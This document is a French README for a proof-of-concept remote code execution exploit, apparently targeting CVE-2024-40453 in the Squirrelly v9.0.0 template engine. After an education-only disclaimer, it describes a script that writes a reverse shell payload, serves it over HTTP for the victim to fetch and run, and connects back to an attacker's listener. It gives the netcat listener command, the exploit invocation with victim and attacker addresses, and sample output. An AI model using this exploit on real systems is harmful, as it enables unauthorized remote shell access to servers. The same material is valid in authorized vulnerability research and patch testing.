
CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc
Ce script est uniquement destiné à un usage éducatif.
Ne l’utilisez pas à des fins illégales.
Si vous le faites, cela relève entièrement de votre responsabilité ; je ne suis pas responsable de toute utilisation abusive.
Ce script crée un reverse shell appelé payload.sh dans le répertoire courant.
Ensuite, il héberge un serveur HTTP sur le port 80 pour que la victime puisse récupérer le payload.sh.
Un écouteur doit être démarré sur la machine de l’attaquant.
Le serveur HTTP s’arrête après 3 secondes pour permettre à la victime de récupérer et d’exécuter le payload.sh.
Basé sur les informations suivantes, cette POC a été développée. https://samuzora.com/posts/cve-2024-40453
Démarrez votre écouteur
rlwrap nc -nvlp 3000
Exécutez le payload
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!